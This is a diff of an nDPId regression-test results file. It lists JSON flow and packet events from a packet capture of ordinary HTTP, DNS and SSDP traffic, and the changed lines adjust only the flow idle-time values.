+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1470104380603,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104380603,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLUAAAQRv8HAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} @@ -174,18 +174,18 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1470104380772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1470104380772,"pkt":"ABxCjnAxTF4M6gNlCABFAABmlL4AAC4RtAgICAgIwKhzCAA11JQAUqbTpTiBgAABAAIAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQABwAwABQABAAABKwANCnByb3h5LXNldDHAD8AtAAEAAQAAASsABMvNl+o="} 00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380909,"flow_last_seen":1470104380909,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104380909,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1470104380909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104380909,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1470104381115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381115,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEIAAAER2QjAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381217,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U68AAAERvz7AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} @@ -193,16 +193,16 @@ 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381217,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFE8AAAER7zXAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"} 